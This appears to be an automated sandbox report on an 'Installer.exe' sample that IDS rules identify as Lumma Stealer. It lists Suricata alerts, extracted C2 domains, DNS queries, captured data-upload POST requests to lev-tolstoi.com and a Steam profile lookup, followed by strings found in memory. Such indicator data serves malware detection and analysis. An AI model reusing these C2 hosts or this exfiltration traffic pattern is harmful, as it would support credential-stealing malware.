Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Joe Sandbox View | IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=PTTT95CE7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18114 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=V65PP5PG20H | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8747 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=L860Q9XLZ5OUXDNV6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20436 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=I6ZOP83R0K | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1218 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8TXD8I0K6I3O97JCMUW | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570573 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 87 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=fd92c37599526c48ee9a2e2b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 27 Dec 2024 22:13:26 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controloz2 equals www.youtube.com (Youtube)
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: Installer.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Installer.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Installer.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Installer.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Installer.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Installer.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Installer.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Installer.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coc.
                Source: Installer.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: Installer.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Installer.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: Installer.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Installer.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Installer.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Installer.exe, 00000003.00000003.1808852557.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.0000000003596000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
